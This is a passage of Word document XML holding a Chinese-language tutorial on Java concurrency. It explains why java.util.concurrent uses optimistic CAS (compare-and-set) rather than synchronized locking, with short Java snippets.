      <w:r w:rsidR="00AD50C6" w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE15B2" w:rsidRDefault="00CE15B2" w:rsidP="005E3EF2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>包里提供了很多面向并发编程的类</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用这些类在多核</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的机器上会有比较好的性能</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>主要原因是</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这些类里面大多使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>重试方式的</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>乐观锁</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="003D3504">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方式的悲观锁</w:t>
      </w:r>
      <w:r w:rsidR="00A86956">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="005E3EF2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是单词</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>compare and set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的缩写，意思是指在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之前先比较该值有没有变化，只有在没变的情况下才对其赋值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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我们常常做这样的操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rStyle w:val="tracking-ad"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>[java]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:tooltip="view plain" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId158" w:tgtFrame="_blank" w:tooltip="copy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId159" w:tgtFrame="_blank" w:tooltip="print" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>print</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId160" w:tooltip="?" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(a==b) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    a++;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>试想一下如果在做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>之前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的值被改变了怎么办？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>还执行吗？出现该问题的原因是在多线程环境下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的值处于一种不定的状态。采用锁可以解决此类问题，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>也可以解决，而且可以不加锁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rStyle w:val="tracking-ad"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>[java]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId161" w:tooltip="view plain" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId162" w:tgtFrame="_blank" w:tooltip="copy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId163" w:tgtFrame="_blank" w:tooltip="print" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>print</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId164" w:tooltip="?" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Consolas"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> expect = a;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
